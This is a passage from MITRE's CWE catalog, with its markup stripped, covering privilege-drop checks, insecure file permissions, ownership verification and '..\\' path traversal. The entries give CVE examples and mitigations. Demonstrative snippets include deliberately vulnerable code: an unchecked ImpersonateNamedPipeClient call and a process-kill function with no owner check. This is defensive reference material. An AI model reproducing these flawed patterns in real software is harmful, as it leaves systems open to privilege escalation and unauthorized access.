to drop privileges but does not check or incorrectly checks to see if the drop succeeded. - If the drop fails, the software will continue to run with the raised privileges, which might provide additional access to unprivileged users. - - - - - - - - - Primary - - - - - - - In Windows based environments that have access control, impersonation is used so that access checks can be performed on a client identity by a server with higher privileges. By impersonating the client, the server is restricted to client-level security -- although in different threads it may have much higher privileges. - - - - Architecture and Design - - - Implementation - - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - This issue is likely to occur in restrictive environments in which the operating system or application provides fine-grained control over privilege management. - - - - Medium - - - Access Control - Gain Privileges or Assume Identity - If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped. - - - Access Control - Non-Repudiation - Gain Privileges or Assume Identity - Hide Activities - If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator. - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - Check the results of all functions that return a value and verify that the value is expected. - High - Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. - - - Implementation - In Windows, make sure that the process token has the SeImpersonatePrivilege(Microsoft Server 2003). Code that relies on impersonation for security must ensure that the impersonation succeeded, i.e., that a proper privilege demotion happened. - - - - - This code attempts to take on the privileges of a user before creating a file, thus avoiding performing the action with unnecessarily high privileges: - - bool DoSecureStuff(HANDLE hPipe) {bool fDataWritten = false;ImpersonateNamedPipeClient(hPipe);HANDLE hFile = CreateFile(...);/../RevertToSelf()/../} - - The call to ImpersonateNamedPipeClient may fail, but the return value is not checked. If the call fails, the code may execute with higher privileges than intended. In this case, an attacker could exploit this behavior to write a file to a location that the attacker does not have access to. - - - - - CVE-2006-4447 - Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447 - - - CVE-2006-2916 - Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916 - - - - System Process - - - - Failure to check whether privileges were dropped successfully - - - POS37-C - Ensure that privilege relinquishment is successful - Exact - - - SFP4 - Unchecked Status Condition - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Background_Details, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Failure to Check Whether Privileges Were Dropped Successfully - Improper Check for Successfully Dropped Privileges - - - - The software does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses. - - - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Other - Other - Alter Execution Logic - - - - - CVE-2001-1564 - System limits are not properly enforced after privileges are dropped. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1564 - - - CVE-2005-3286 - Firewall crashes when it can't read a critical memory block that was protected by a malicious process. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3286 - - - CVE-2005-1641 - Does not give admin sufficient privileges to overcome otherwise legitimate user actions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1641 - - - - - Insufficient privileges - - - - CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future. - Overlaps dropped privileges, insufficient permissions. - This has a layering relationship with Unchecked Error Condition and Unchecked Return Value. - Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Maintenance_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationship_Notes, Theoretical_Notes - - Insufficient Privileges - Failure to Handle Insufficient Privileges - - - - During installation, installed file permissions are set to allow anyone to modify those files. - - - - - - - Primary - - - - - - - - - Architecture and Design - - - Implementation - - - Installation - - - Operation - - - Medium - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Inter-application Flow Analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Host Application Interface Scanner - - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - Automated Monitored Execution - Forced Path Execution - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Operation - The architecture needs to access and modification attributes for files to only those users who actually require those actions. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - CVE-2005-1941 - Executables installed world-writable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1941 - - - CVE-2002-1713 - Home directories installed world-readable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1713 - - - CVE-2001-1550 - World-writable log files allow information loss; world-readable file has cleartext passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1550 - - - CVE-2002-1711 - World-readable directory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1711 - - - CVE-2002-1844 - Windows product uses insecure permissions when installing on Solaris (genesis: port error). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1844 - - - CVE-2001-0497 - Insecure permissions for a shared secret key file. Overlaps cryptographic problem. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0497 - - - CVE-1999-0426 - Default permissions of a device allow IP spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0426 - - - - - Insecure Default Permissions - - - FIO06-C - Create files with appropriate access permissions - - - FIO01-J - Create files with appropriate access permission - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Description, Modes_of_Introduction, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Insecure Default Permissions - - - - A product defines a set of insecure permissions that are inherited by objects that are created by the program. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - CVE-2005-1841 - User's umask is used when creating temp files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1841 - - - CVE-2002-1786 - Insecure umask for core dumps [is the umask preserved or assigned?]. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1786 - - - - - Insecure inherited permissions - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - - - A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement. - - - - - - - - - Architecture and Design - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - CVE-2005-1724 - Does not obey specified permissions when exporting. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1724 - - - - - Insecure preserved inherited permissions - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - - - While it is executing, the software sets the permissions of an object in a way that violates the intended permissions that have been specified by the user. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Architecture and Design - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - CVE-2002-0265 - Log files opened read/write. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0265 - - - CVE-2003-0876 - Log files opened read/write. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0876 - - - CVE-2002-1694 - Log files opened read/write. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1694 - - - - - Insecure execution-assigned permissions - - - FIO06-C - Create files with appropriate access permissions - - - FIO01-J - Create files with appropriate access permission - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Insecure Execution-assigned Permissions - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "..\" sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The '..\' manipulation is the canonical manipulation for operating systems that use "\" as directory separators, such as Windows. However, it is also useful for bypassing path traversal protection schemes that only assume that the "/" separator is valid. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0661 - "\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661 - - - CVE-2002-0946 - Arbitrary files may be read files via ..\ (dot dot) sequences in an HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946 - - - CVE-2002-1042 - Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via "..\" sequences in queries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042 - - - CVE-2002-1209 - Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via "..\" sequences in a GET request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209 - - - CVE-2002-1178 - Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via "..\" sequences in an HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178 - - - - - '..\filename' ('dot dot backslash') - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms, Description, Name - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - Path Issue - Dot Dot Backslash - '..\filename' - Path Traversal: '..\filename' - - - - The application does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the application in an invalid state. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Other - Alter Execution Logic - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - Always check to see if you have successfully accessed a resource or system functionality, and use proper error handling if it is unsuccessful. Do this even when you are operating in a highly privileged mode, because errors or environmental conditions might still cause a failure. For example, environments with highly granular permissions/privilege models, such as Windows or Linux capabilities, can cause unexpected failures. - - - - - CVE-2003-0501 - Special file system allows attackers to prevent ownership/permission change of certain entries by opening the entries before calling a setuid program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0501 - - - CVE-2004-0148 - FTP server places a user in the root directory when the user's permissions prevent access to the their own home directory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0148 - - - - - Fails poorly due to insufficient permissions - - - 17 - Improper Filesystem Permissions - - - SFP4 - Unchecked Status Condition - - - - CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future. - This can be both primary and resultant. When primary, it can expose a variety of weaknesses because a resource might not have the expected state, and subsequent operations might fail. It is often resultant from Unchecked Error Condition (CWE-391). - Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource). - This type of issue is under-studied, since researchers often concentrate on whether an object has too many permissions, instead of not enough. These weaknesses are likely to appear in environments with fine-grained models for permissions and privileges, which can include operating systems and other large-scale software packages. However, even highly simplistic permission/privilege models are likely to contain these issues if the developer has not considered the possibility of access failure. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Theoretical_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Failure to Handle Insufficient Permissions or Privileges - - - - The software does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended. - - - - - - - Resultant - This is resultant from errors that prevent the permissions from being preserved. - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - CVE-2002-2323 - Incorrect ACLs used when restoring backups from directories that use symbolic links. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2323 - - - CVE-2001-1515 - Automatic modification of permissions inherited from another file system. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1515 - - - CVE-2005-1920 - Permissions on backup file are created with defaults, possibly less secure than original file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1920 - - - CVE-2001-0195 - File is made world-readable when being cloned. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0195 - - - - - Permission preservation failure - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - Permission Preservation Failure - - - - The software assigns the wrong ownership, or does not properly verify the ownership, of an object or resource. - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - - - CVE-1999-1125 - Program runs setuid root but relies on a configuration file owned by a non-root user. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1125 - - - - File or Directory - - - - Ownership errors - - - - - - - - The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Ownership Issues - - - - The software does not properly verify that a critical resource is owned by the proper entity. - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Gain Privileges or Assume Identity - An attacker could gain unauthorized access to system resources. - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. - - - - - This function is part of a privileged program that takes input from users with potentially lower privileges. - - def killProcess(processID):os.kill(processID, signal.SIGKILL) - - - This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes. - This function remedies the problem by checking the owner of the process before killing it: - - def killProcess(processID): - user = getCurrentUser() - - #Check process owner against requesting user - if getProcessOwner(processID) == user:os.kill(processID, signal.SIGKILL)return - else:print("You cannot kill a process you don't own")return - - - - - - - - - CVE-2001-0178 - Program does not verify the owner of a UNIX socket that is used for sending a password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0178 - - - CVE-2004-2012 - Owner of special device not checked, allowing root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2012 - - - - - Unverified Ownership - - - - This overlaps insufficient comparison, verification errors, permissions, and privileges. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. - - Access control involves the use of several protection mechanisms such as: - - Authentication (proving the identity of an actor) - Authorization (ensuring that a given actor can access a resource), and - Accountability (tracking of activities that were performed) - - When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc. - There are two distinct behaviors that can introduce 